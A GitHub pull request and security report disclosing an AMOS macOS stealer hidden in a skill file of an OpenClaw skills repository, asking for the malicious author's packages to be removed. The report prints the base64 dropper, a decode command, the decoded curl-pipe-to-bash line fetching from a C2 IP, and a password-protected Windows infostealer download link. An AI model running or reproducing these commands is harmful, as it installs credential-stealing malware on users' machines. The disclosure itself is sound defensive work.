security: remove all skills from malicious author sakaen736jih (ClawHavoc/AMOS payload)#117
Closed
winteriscome wants to merge 1 commit intoopenclaw:mainfrom
Closed
Conversation
Remove all skills published by sakaen736jih, a confirmed malicious actor responsible for 390 malicious packages in the ClawHavoc campaign (Antiy CERT). The skill nano-pdf-lqbmv (commit b3680e3) contains an Atomic macOS Stealer (AMOS) payload connecting to C2 server 91.92.242.30. References: - Antiy CERT ClawHavoc Analysis (2026-02-05) - Trend Micro AMOS Distribution Report (2026-02-23) - Koi Security ClawHub Audit (2026-02-01)
|
Thanks for the pull request! This repository is read-only and is automatically synced from https://clawhub.ai, so we can’t accept changes here. Please make updates on the website instead. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
A confirmed malicious skill
skills/sakaen736jih/nano-pdf-lqbmvexists in this repository, containing an Atomic macOS Stealer (AMOS) dropper payload. The skill was published byclawdhub[bot]via automated sync (commit b3680e3, Jan 31, 2026) and remains accessible as of Feb 26, 2026. The authorsakaen736jihis a known threat actor responsible for 390 malicious packages in the ClawHavoc campaign, as confirmed by Antiy CERT, Trend Micro, Bitdefender, and Permiso Security.Details
Malicious payload location:
skills/sakaen736jih/nano-pdf-lqbmv/SKILL.md, line 26The SKILL.md contains a social engineering block disguised as a "prerequisite":
Base64 decoded payload:
This connects to C2 server
91.92.242.30, which is confirmed ClawHavoc infrastructure serving AMOS (Atomic macOS Stealer).Windows vector in the same SKILL.md:
A link to
github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip— a password-protected ZIP (password: "openclaw") containing a Windows infostealer variant.Additional context: This issue is related to openclaw/clawhub#129 — malicious skills deleted from ClawHub GUI still persist in this repository because
clawdhub[bot]sync is one-directional (publish only, no delete propagation).The author
sakaen736jihhas 390 malicious packages still potentially in this repository. Other known malicious authors (Antiy CERT data):hightower6eu(677),moonshine-100rze(60),jordanprater(10), and 8 others totaling 1,184 malicious packages.PoC
Clone the repository:
git clone --depth 1 https://github.com/openclaw/skills.gitRead the malicious file:
cat skills/sakaen736jih/nano-pdf-lqbmv/SKILL.mdDecode the Base64 payload (DO NOT EXECUTE):
echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -dOutput confirms connection to known C2:
/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"The C2 IP
91.92.242.30is documented by multiple security vendors as the primary ClawHavoc AMOS distribution server.No special configuration needed. The malicious content is in the committed file itself.
Impact
Who is impacted: Any user who installs this skill via
clawhub install, clones this repository, or visits third-party skill directories (e.g., openclawskills.best, SkillsMP.com) that mirror this repository's content.What is stolen (AMOS capabilities):
Severity: This is a supply chain attack — malicious code is hosted in an official repository and distributed through automated tooling (
clawdhub[bot]), giving it implicit trust.References: